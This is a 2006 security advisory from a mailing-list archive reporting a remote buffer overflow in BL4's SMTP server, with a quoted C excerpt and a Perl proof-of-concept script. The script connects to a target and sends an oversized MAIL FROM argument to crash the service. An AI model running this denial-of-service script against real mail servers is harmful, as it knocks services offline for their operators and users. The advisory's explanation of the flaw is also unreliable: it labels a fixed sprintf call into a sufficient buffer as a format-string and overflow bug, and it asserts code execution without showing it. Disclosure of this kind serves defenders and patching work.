<<< Date Index >>>     <<< Thread Index >>>

BL4's SMTP server BufferOverflow Vulnerable



---------------------------------------------------------------------------
[ECHO_ADV_30$2006] BL4's SMTP server BufferOverflow Vulnerable
---------------------------------------------------------------------------

Author       : Dedi Dwianto
Date         : April, 27th 2006
Location     : Indonesia, Jakarta
Web          : http://advisories.echo.or.id/adv/adv30-theday-2006.txt
Critical Lvl : High
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


Application : BL4's SMTP server
version     : < 0.1.5
URL         : http://bl4qkubartnndfhr.emmeya.com/prog/smtp?0
Description :

BL4's SMTP server is an inbound only SMTP server.
It currently uses hardcoded values for handling email. 
The SMTP server puts the incoming email into various text files.

---------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~~~~~~
BL4's SMTP server is to a flaw that can allow remote attacker to
cause a denial of service or a attacker can Execution of Arbitrary Code.
The vulnerability is due to a buffer overflow in the SMTP service. 
A remote attacker can repeatedly send more that 2100 bytes as the argument to 
the HELO, MAIL FROM, and RCPT TO commands to crash the server.

------------------think.c-----------------------------------
                ...........
                {
                        slaveEmail[x]->isData = 0;
                        slaveEmail[x]->emailFrom = 0;
                        slaveEmail[x]->emailTo = 0;
                        free(buffer);
                        buffer = malloc(sizeof(char) * 12);
                        sprintf(buffer, "250 OK\r\n");
                        return buffer;
                }
                free(buffer);
                .............
                slaveEmail[x]->EHLO = buffer;
                slaveEmail[x]->EHLOtrue = 1;

                buffer = malloc(sizeof(char) * 12);
                sprintf(buffer, "250 OK\r\n"); 
                return buffer;
-----------------------------------------------------------
        --
        sprintf(buffer, "250 OK\r\n");
        --
        Vulnerable for format strings.
        
        --
        free(buffer);
        buffer = malloc(sizeof(char) * 12);
        --
        Vulnerable for buffer overflow.
A attacker can create Arbitrary Code here .


Poc:
~~~~~~~~~~~~

#!/usr/bin/perl

use IO::Socket;
use Socket;

my($socket) = "";


if($#ARGV < 1 | $#ARGV > 2) {usage()}

if($#ARGV > 2) { $prt = $ARGV[1] } else { $prt = "25" };
$adr = $ARGV[0];
$prt = $ARGV[1];

$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$adr,
PeerPort=>$prt, Reuse=>1) or die "Error: cant connect to $adr:$prt\n";


        print " -- Connecting To SMTP server at $adr port $prt ... \n";

        sleep(1);

        print $socket "EHLO yahoo.com\r\n" and print " -- Sending Request to 
$adr .....\n" or die "Error : can't send Request\n";

        sleep(1);

        print $socket "MAIL FROM:" . "jessy" x 4600 . "\r\n" and print " -- 
Sending Buffer to $adr .....\n";

        sleep(1);
        printf("[+]Ok!\n");
        printf("[+]Crash service.....\n");
        printf("[~]Done.\n");

        close($socket);


sub usage()
 {
 print "\n=========================================\r\n";
 print "     BL4's SMTP server Remote DOS \r\n";
 print "=========================================\r\n";
 print "       Bug Found by Dedi Dwianto \r\n";
 print "    www.echo.or.id #e-c-h-o irc.dal.net \r\n";
 print "      Echo Security Research Group \r\n";
 print "=========================================\r\n";
 print " Usage: perl bl4-explo.pl [target] [port] \r\n\n";
 exit();
 }


---------------------------------------------------------------------------
Shoutz:
~~~~~~~

~ y3dips,moby,comex,z3r0byt3,K-158,c-a-s-e,S`to,lirva32,anonymous
~ newbie_hacker@xxxxxxxxxxxxxxx
~ #aikmel #e-c-h-o @irc.dal.net
---------------------------------------------------------------------------
Contact:
~~~~~~~~

     Dedi Dwianto || echo|staff || the_day[at]echo[dot]or[dot]id
     Homepage: http://theday.echo.or.id/

-------------------------------- [ EOF ] ----------------------------------